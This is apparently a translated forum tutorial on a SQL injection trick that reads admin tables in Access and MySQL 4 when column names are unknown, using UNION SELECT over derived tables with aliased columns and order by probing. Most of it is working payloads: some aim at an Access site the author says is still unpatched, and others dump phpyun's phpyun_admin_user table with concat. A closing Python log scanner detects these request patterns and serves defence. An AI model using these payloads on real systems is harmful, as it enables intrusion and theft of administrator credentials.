When this trick is useful: you know the table name but can't guess the column names
A few days ago I read this article: http://www.91ri.org/11120.html, which covers a small Access injection trick. If you have already read and understood it, just skip the first half of this post~~
Then today it occurred to me that MySQL 4 has no information_schema, which means table names and column names have to be guessed, just like in Access, so~~ this trick might come in handy there too
ACCESS:
Does anyone still remember http://sb.f4ck.org/thread-6017-1-1.html? Access offset injection. Right, that one has a precondition: the table you want to inject (usually the admin table) must have fewer columns than the table the current query selects from (for example the articles table)
But with the little trick described today, that restriction can be ignored~~~
The other precondition is the same: you need to know the table name~~ here it is admin~~ (PS: I have no idea why, after all this time, they still haven't fixed the injection flaw...)
First, we already know from the earlier injection that there are 8 columns here, so we construct the following statement directly:
- x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select * from admin order by 1)
Let's break it down:
- union select 1,2,3,4,5,6,7,8 matches the column count of the preceding query
- from(x) uses a derived table~~
- select * from admin order by 1 builds the derived table
Now look at order by 5:
Clearly the columns are no longer displayed, which means there are not 5 columns; as the earlier article said, admin has only 4 columns
So we construct:
- x.asp?id=90 union select 1,2,3,4,5,6,7,8 from(select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)
Breaking it down again:
- union select 1,2,3,4,5,6,7,8 matches the column count of the preceding query
- select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 gives every column an alias, so that later we can refer to the columns whose names we don't know through those aliases
- where 1=2 makes the condition on the aliased row false, so what gets displayed is the content of the union select that follows
- union select * from admin is the union query that actually returns the contents of every column of the admin table
Next we put our aliases to use:
Here I couldn't get the "field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5" method from that article to work; I could only use the aliases directly. Maybe my Access is just too broken...
So:
- .asp?id=-90 union select 1,a_4,a_3,4,5,6,7,8 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4 from admin where 1=2 union select * from admin)
This simply displays a_4 and a_3. As for why it is a_4 and a_3, that was found by trial and error... next time it might be a_1 and a_2
==================================================================================
MYSQL:
Now MySQL. Since MySQL 4 has no information_schema, this may well be useful there~
Let's use php_yun for the demo:
We select two arbitrary fields:
- SELECT id,name FROM `phpyun_description` where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 1)a
Note a difference from Access here: MySQL does not automatically assign an alias to a derived table, so we have to append an a, or as a, at the end
What goes wrong otherwise, readers can try for themselves~~~
Then we need to guess the column count of phpyun_admin_user
- SELECT id,name FROM `phpyun_description` where id = 1 union select 1,2 from (select * from phpyun_admin_user order by 6)a
It turns out to be 6 columns
Next we construct the "sub-statement that uses the aliased columns to query all fields":
- select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user
Finally we splice it all together:
- SELECT id,name FROM `phpyun_description` where id = 1 and 1=2 union select a_3,a_4 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a
And since this is MySQL, everything can be displayed at once~~ with concat there is no need to test column by column which one it is
- SELECT id,name FROM `phpyun_description` where id = 1 and 1=2 union select 1,concat(a_1,0x23,a_2,0x23,a_3,0x23,a_4,0x23,a_5,0x23,a_6) from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from phpyun_admin_user where 1=2 union select * from phpyun_admin_user)a
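From the defending side, the payloads above leave a very recognisable shape in web server logs: a UNION whose FROM is a derived table, a dummy aliased row sealed off with where 1=2, and order by N column-count probing. The following scanner is an added example of mine (not code from the original post or from phpyun); the log lines, path names and signature names are constructed for the demo.

```python
"""Flag the alias/derived-table UNION probing technique in web access logs."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic): method, request path, status.
# Lines 2-4 reuse the request shapes discussed above; lines 1 and 5 are benign.
SAMPLE_LOG = """\
GET /x.asp?id=90 200
GET /x.asp?id=90+union+select+1,2,3,4,5,6,7,8+from(select+*+from+admin+order+by+5) 200
GET /x.asp?id=-90+union+select+1,a_4,a_3,4,5,6,7,8+from+(select+1+as+a_1,2+as+a_2,3+as+a_3,4+as+a_4+from+admin+where+1=2+union+select+*+from+admin) 200
GET /index.php?id=1+union+select+1,concat(a_1,0x23,a_2)+from+(select+1+as+a_1,2+as+a_2+from+phpyun_admin_user+where+1=2+union+select+*+from+phpyun_admin_user)a 200
GET /search.php?q=order+by+date 200
"""

def normalize(raw: str) -> str:
    """URL-decode twice (catches double encoding), drop /* */ comments, collapse whitespace, lowercase."""
    s = unquote_plus(unquote_plus(raw))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).lower()

# Signatures for the technique on this page; names are constructed for the demo.
SIGNATURES = {
    # UNION SELECT whose FROM clause opens a derived table: "from (select" / "from(select"
    "union_derived_table": re.compile(r"union\s+select\b.*\bfrom\s*\(\s*select\b"),
    # aliased dummy row (as a_N) sealed off with WHERE 1=2, then UNION SELECT * of the real table
    "alias_probe": re.compile(r"\bas\s+a_\d+\b.*\bwhere\s+1\s*=\s*2\b.*\bunion\s+select\s+\*"),
    # ORDER BY <integer>: column-count probing against the derived table
    "order_by_count": re.compile(r"\border\s+by\s+\d+\b"),
}

def classify(line: str) -> list[str]:
    """Return the signature names that fire on one access-log line (empty list = clean)."""
    parts = line.split()
    if len(parts) < 2 or "?" not in parts[1]:
        return []
    query = normalize(parts[1].split("?", 1)[1])
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan(log: str) -> dict[int, list[str]]:
    """Map 1-based log line number -> fired signatures, only for lines that fired something."""
    hits = {}
    for n, line in enumerate(log.splitlines(), 1):
        names = classify(line)
        if names:
            hits[n] = names
    return hits
```

A plain `order by <word>` in a search parameter does not fire, so the count probe is only reported together with a UNION or on a numeric ORDER BY.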